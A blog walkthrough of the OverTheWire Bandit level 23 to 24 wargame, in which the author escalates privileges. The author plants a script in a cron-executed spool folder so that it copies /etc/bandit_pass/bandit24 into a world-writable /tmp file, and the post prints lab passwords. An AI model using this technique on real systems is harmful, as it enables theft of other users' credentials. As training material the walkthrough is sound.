MayADevBe Blog

A Blog about Computer Science

OverTheWire Bandit Level 23 -> 24 - Walkthrough

Previous Level: Level 23


Login

SSH: ssh bandit23@bandit.labs.overthewire.org -p 2220

Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Task

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

A little bit of Theory

In this level the theory from level 22 and level 23 is needed. It again deals with cronjobs and bash scripting.

Solution

This level starts the same way as the previous ones. I looked at the cronjobs and what file gets executed.

bandit23@bandit:~$ ls -la /etc/cron.d
total 36
drwxr-xr-x  2 root root 4096 Jul 11  2020 .
drwxr-xr-x 87 root root 4096 May 14  2020 ..
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit15_root
-rw-r--r--  1 root root   62 Jul 11  2020 cronjob_bandit17_root
-rw-r--r--  1 root root  120 May  7  2020 cronjob_bandit22
-rw-r--r--  1 root root  122 May  7  2020 cronjob_bandit23
-rw-r--r--  1 root root  120 May 14  2020 cronjob_bandit24
-rw-r--r--  1 root root   62 May 14  2020 cronjob_bandit25_root
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

The script executes and then deletes all files in the folder ‘/var/spool/bandit24’. It operates on that folder because it runs as the bandit24 user, so the variable ‘myname’ contains the value ‘bandit24’. The for loop goes through the files, including hidden ones. The first if statement makes sure the entries ‘.’ and ‘..’, which represent the current and parent folders, are ignored. Inside it, a second if statement executes the file with a 60-second timeout, but only if its owner is bandit23. The file is then deleted, regardless of whether it was executed.
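The checks described above can be replayed without executing anything. The following dry-run audit is an added example, not code from the original post or from OverTheWire: it reports whether a cron-driven folder is writable by other users and which files in it would pass the owner check. The names audit_spool and demo and the finding labels are hypothetical, and the demo folder is constructed.

```bash
#!/bin/bash
# Added example, not part of the original post: dry-run audit of a folder
# whose files a cron job executes, mirroring the checks in cronjob_bandit24.sh.
# Usage: audit_spool DIR ALLOWED_OWNER   (both names are hypothetical)
# Returns 0 if nothing was flagged, 1 if there are findings, 2 on error.
audit_spool() {
    local dir=$1 allowed=$2 mode owner f findings=0
    # -c is the short form of the --format option used in the cron script
    mode=$(stat -c '%a' "$dir" 2>/dev/null) || return 2

    # The last octal digit is the permission set for "other"; 2 = write.
    case $mode in
        *[2367]) echo "DIR_WRITABLE_BY_OTHERS $dir mode=$mode"; findings=1 ;;
    esac

    # Same iteration as the cron loop: normal names plus dotfiles.
    for f in "$dir"/* "$dir"/.*; do
        case ${f##*/} in .|..) continue ;; esac
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        owner=$(stat -c '%U' "$f" 2>/dev/null) || continue
        if [ "$owner" = "$allowed" ]; then
            # The cron script would run this file as the job's user.
            echo "WOULD_EXECUTE ${f##*/} owner=$owner"
            findings=1
        else
            echo "WOULD_DELETE_ONLY ${f##*/} owner=$owner"
        fi
    done
    return "$findings"
}

# Constructed demo: a throwaway folder stands in for the spool folder and
# the current user stands in for the allowed owner.
demo() {
    local d me rc=0
    d=$(mktemp -d) || return 2
    me=$(stat -c '%U' "$d")
    chmod 777 "$d"
    printf '#!/bin/bash\necho hi\n' > "$d/job.sh"
    audit_spool "$d" "$me" || rc=$?
    rm -rf "$d"
    return "$rc"
}

demo || true
```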

Since we are currently logged in as the bandit23 user, we can create a script that will give us the password for bandit24. First, create the file in a folder under ‘/tmp’. This prevents an early deletion of the file, and you have a copy in case something goes wrong. Then copy the file to the folder ‘/var/spool/bandit24’ and it will be executed.

You can either echo the lines in the file or use a text editor like nano or vim. In nano, you can use CTRL+S to save and CTRL+X to quit.

bandit23@bandit:~$ mktemp -d
/tmp/tmp.ljEyl6kv1M
bandit23@bandit:~$ cd /tmp/tmp.ljEyl6kv1M
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ nano bandit24_pass.sh

I based my script on the scripts seen previously, but there are many ways to write this. The first line is, as always, the shebang, indicating that it is a bash script. The second line writes the password of bandit24 into a file in the created folder.

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/tmp.ljEyl6kv1M/password

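Now you only need to give the necessary permissions to the folder and the file. The script runs as bandit24, so that user must be able to execute the script, enter the folder and write the output file. Finally, copy the file into the correct folder. I also created the output file and gave it full permissions.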

bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ chmod +rx bandit24_pass.sh 
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ chmod 777 /tmp/tmp.ljEyl6kv1M
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ touch password
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ chmod +rwx password 
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ ls -la
total 1120
drwxrwxrwx    2 bandit23 root        4096 Jun 17 16:32 .
drwxrws-wt 4795 root     root     1134592 Jun 17 16:33 ..
-rwxr-xr-x    1 bandit23 root          73 Jun 17 16:16 bandit24_pass.sh
-rwxrwxrwx    1 bandit23 bandit23       0 Jun 17 16:32 password
bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ cp bandit24_pass.sh /var/spool/bandit24/bandit24_pass.sh

Once this is done, you only need to wait for a minute and read the password file. If the file is empty, check the permissions and the script for any typos.

bandit23@bandit:/tmp/tmp.ljEyl6kv1M$ cat password 
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Edit (10.02.2023): This level has been slightly changed. The folder into which the script needs to be copied has changed, which can lead to a permission error when trying to use the ‘cp’ command. Make sure to check the cronjob script for the correct folder.


https://overthewire.org/wargames/bandit/bandit24.html


Next Level: Level 25

